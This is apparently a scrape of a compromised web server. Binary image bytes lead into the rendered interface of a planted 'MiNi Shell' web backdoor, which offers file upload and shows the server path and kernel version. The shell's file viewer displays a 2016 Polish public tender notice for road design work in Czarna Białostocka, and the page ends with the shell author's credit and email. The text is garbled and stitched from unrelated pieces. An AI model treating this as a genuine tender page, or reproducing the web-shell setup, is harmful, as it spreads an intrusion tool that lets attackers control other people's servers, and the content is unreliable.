JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160226/19305-N-2016.html

<p class="kh_header"><b>Białystok: Opracowanie dokumentacji projektowej na:
Zadanie I. - Rozbudowę dróg powiatowych Nr 2300 B - ul. Torowa, Nr 2302 B 
- ul. Sienkiewicza i Nr 2303 B - ul. Fabryczna w Czarnej Białostockiej 
  Zadanie II. - Rozbudowę drogi powiatowej Nr 2301B: ul. Kościelna w Czarnej Białostockiej</b><br>
<b>Numer ogłoszenia: 19305 - 2016; data zamieszczenia: 26.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Białymstoku , Zaścianki, Szosa Baranowicka 37, 15-522 Białystok, woj. podlaskie, tel. (085) 740-21-49, 740-22-17, faks (085) 740-22-19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na:
Zadanie I. - Rozbudowę dróg powiatowych Nr 2300 B - ul. Torowa, Nr 2302 B 
- ul. Sienkiewicza i Nr 2303 B - ul. Fabryczna w Czarnej Białostockiej 
  Zadanie II. - Rozbudowę drogi powiatowej Nr 2301B: ul. Kościelna w Czarnej Białostockiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na:
Zadanie I. - Rozbudowę dróg powiatowych Nr 2300 B - ul. Torowa, Nr 2302 B 
- ul. Sienkiewicza i Nr 2303 B - ul. Fabryczna w Czarnej Białostockiej 
  Zadanie II. - Rozbudowę drogi powiatowej Nr 2301B: ul. Kościelna w Czarnej Białostockiej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
 Dla zadania I - 2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi zamówienia  tj. każda dokumentacja dotyczące projektu budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m  dla których uzyskano pozwolenie na budowę

oraz 1 dokumentacji projektowej  na budowę lub przebudowę obiektu mostowego o świetle min 4,5 m, dla której uzyskano pozwolenie na budowę 

 Dla zadania II - 2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi za-mówienia  tj. każda dokumentacja dotyczące projektu budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m wraz z kanalizacją deszczową o dług. min. 50 m dla których uzyskano pozwolenie na budowę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca  przedstawi  wraz z ofertą osoby,  które spełniają następujące wymagania:
Dla zadania I
1)	min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
 -  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  (bez ograniczeń) lub im  równoważne.  
-  projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m dla których uzyskano  pozwolenie na budowę
2) min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca
minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
 -  projektant powinien posiadać  uprawnienia  projektowe w specjalności mosty (bez ograniczeń) lub   im  równoważne,  
 -  projektant powinien opracować  min.1 dokumentację projektową dotyczącą projektu budowy   lub przebudowy obiektu mostowego o świetle min 4,5 m dla której uzyskano pozwolenie na budowę          

Dla zadania II
1)	min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
-  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  (bez ograniczeń) lub im  równoważne.  
-  projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu  budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m  dla których uzyskano pozwolenie na budowę 
2)	 min jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie
- projektant powinien posiadać  uprawnienia projektowe w specjalności instalacyjnej w
 zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych ,
 wodociągowych i kanalizacyjnych (bez ograniczeń ) lub im równoważne i
- projektant powinien opracować  min. 1 dokumentację projektowa dotycząca projektu budowy lub przebudowy kanalizacji deszczowej o dług. min. 50 m. dla której uzyskano pozwolenie na budowę 
3) min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca
 minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
-  projektant powinien posiadać  uprawnienia  projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  lub  im  równoważne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykazać usługi na potwierdzenie spełnienia warunków udziału w postępowaniu;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożnością dotrzymania terminów określonych w formularzu cenowym, termin ten może ulec przedłużeniu, nie więcej jednak, niż o czas trwania tych okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego, pokój nr 17 lub za pośrednictwem poczty lub na w/p stronie internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2016 godzina 10:50, miejsce: Siedziba Zamawiającego pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: Rozbudowę dróg powiatowych Nr 2300 B -
 ul. Torowa, Nr 2302 B - ul. Sienkiewicza i Nr 2303 B - ul. Fabryczna w Czarnej Białostockiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie na to zadanie składa się z 3 zadań:
1. Rozbudowa  drogi powiatowej Nr 2300 B - ul. Torowa w Czarnej Białostockiej
2. Rozbudowa  drogi powiatowej Nr 2302 B - ul. Sienkiewicza w Czarnej Białostockiej
3. Rozbudowa drogi powiatowej Nr 2303 B - ul. Fabryczna w Czarnej Białostockiej 
Dla 1, 2 i 3 zadania zamawia się opracowania wspólne i rozłączne wymienione w formularzach cenowych SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na:
 Rozbudowę drogi powiatowej Nr 2301B: 
ul. Kościelna w Czarnej Białostockiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący
Ulica w mieście Czarna Białostocka - jezdnia bitumiczna szer. 6,0m, przekrój uliczny, półuliczny i szlakowy;  istniejący parking na wysokości kościoła. Długość odcinka ok. 1,0 km.
2.	Dane wyjściowe do projektowania
Opracować projekt rozbudowy drogi polegającej na:
1.  budowie ciągu pieszo rowerowego z kostki betonowej typu Polbruk (bez faski) gr. 8cm, na podsypce piaskowej gr. 5cm na długości ok. 1,0 km.
- strona prawa na odcinku od ul. Marszałkowskiej do drugiego wjazdu na cmentarz, szerokość 3,5m,
2.  budowie ciągu pieszo rowerowego z betonu asfaltowego gr. 3+3cm, na podbudowie z kruszywa naturalnego
- strona prawa na odcinku od drugiego wjazdu na cmentarz do ul. Fabrycznej
 3. budowie/przebudowie zjazdów indywidualnych i publicznych z czerwonej kostki betonowej typu Polbruk gr. 8cm lub z betonu asfaltowego, na podbudowie z kruszywa łamanego (krawężniki najazdowe) - strona prawa (kilometraż od ul. Marszałkowskiej)
4. budowie parkingu: 
- na wysokości cmentarza i działki nr 220/5, od drogi gminnej ul. Leśna do drugiego wjazdu na cmentarz, nawierzchnia z kostki betonowej typu Polbruk gr. 8cm na podbudowie z kruszywa łamanego. Krawężniki najazdowe.
5. przebudowie parkingu na wysokości kościoła (strona prawa - kilometraż od ul. Marszałkowskiej) - nawierzchnia z kostki betonowej typu Polbruk gr. 8cm na podbudowie z kruszywa naturalnego. Krawężniki najazdowe.
6.	Przewidzieć do wymiany na nowe krawężniki na odcinku od parkingu na wysokości kościoła do ul. Leśnej.
7.	Przewidzieć uporządkowanie zieleńców polegające na zdjęciu nadmiaru gruntu, ułożeniu warstwy ziemi urodzajnej i zasianiu trawy.
8.	Przewidzieć do wycinki wszystkie drzewa kolidujące z rozbudową drogi. Drzewa przewidziane do wycinki należy ponumerować na mapie syt.-wys. Przewidzieć do wycinki zbędne zakrzaczenie.

9.	W porozumieniu z Zamawiającym przewidzieć budowę elementów sieci kanalizacji deszczowej tj. studzienek ściekowych z wyprowadzeniem wód opadowych przykanalikami do rowu odparowującego.
10.	Przewidzieć bariery odgradzające w miejscach uznanych za niebezpieczne.
11.	Przewidzieć przebudowę urządzeń obcych:
a)	napowietrzna linia nn wraz z przyłączami na odcinku ok. 200m - przestawienie słupów poza ciąg pieszo rowerowy.
b)	wodociąg na dł. ok. 130m.
W przypadku stwierdzenia innych kolizji należy powiadomić Zamawiającego, który podejmie decyzję o zleceniu  dodatkowego opracowania branżowego.
3. ZAKRES OPRACOWANIA
3.1 Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia, w tym uzgodnienia z PKP, i ponieść koszty  tych uzgodnień, do   pozwolenia na budowę. Zamawiający przewiduje uzyskanie zgody na realizację inwestycji drogowej w ramach  Specustawy drogowej. Projekt wykonać na aktualnej mapie do celów projektowych w skali 1:500. Tytuł projektu budowlanego uzgodnić z Zamawiającym.
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.
 3.2. Dodatkowo należy opracować:
-	projekt stałej organizacji ruchu,
-	operat wodnoprawny na wyprowadzenie wód opadowych do ziemi,
-	badania geotechniczne
-	przedmiary robót ( w tym ślepe kosztorysy ofertowe) podzielone na: 1. - roboty związane z wykonaniem ciągu pieszo rowerowego; 2. - pozostały zakres robót,
      Dokumentację należy przekazać:
1. Materiały do opiniowania ze Specustawy drogowej   wraz z naniesionymi na mapę projektowanymi  podziałami działek                                       - 7 egz. 2. mapa do celów projektowych w skali 1:500                                 - 1 egz.
3. Projekt budowlany                                                                    - 4 egz
 4. Projekt wykonawczy (techniczny) branża drogowa z częścią przedmiarową i ST                                                                       - 5 egz. 
5.  Projekt wykonawczy (techniczny) branża sanitarna (przebudowa wodociągu i budowa elementów sieci kanalizacji deszczowej) z częścią przedmiarową i ST                                                                      - 5 egz. 
6. Projekt wykonawczy (techniczny) branża elektroenergetyczn  z częścią przedmiarową i ST                                                               - 5 egz.
7. Operat wodnoprawny wersja papierowa -  3egz. + wersja elektroniczna 
    - 2 płytki
8. Badania geotechniczne podłoża nawierzchni                        	          2 egz. 
9. Plan wyrębu drzew i krzewów                                                    - 3 egz.
10. Projekt stałej organizacji ruchu                                               - 4 egz.    

  Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta

Obowiązuje przedstawienie do dnia 15.04.2016r. koncepcji zagospodarowania terenu w wersji papierowej, do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych. Koncepcja może być opracowana na mapach zasadniczych dostępnych w Powiatowym Ośrodku Dokumentacji geodezyjnej i Kartograficznej w Białymstoku, Białystok ul. Mickiewicza 3

Obowiązuje przedstawienie do dnia 16.05.2016r. koncepcji w wersji papierowej zawierającej rozwiązania sytuacyjne i wysokościowe (zagospodarowanie terenu, profil podłużny z projektowaną niweletą, przekroje normalne, wybrane przekroje poprzeczne, zdefiniowane kolizje z urządzeniami obcymi dla drogi),  do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.
 
Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com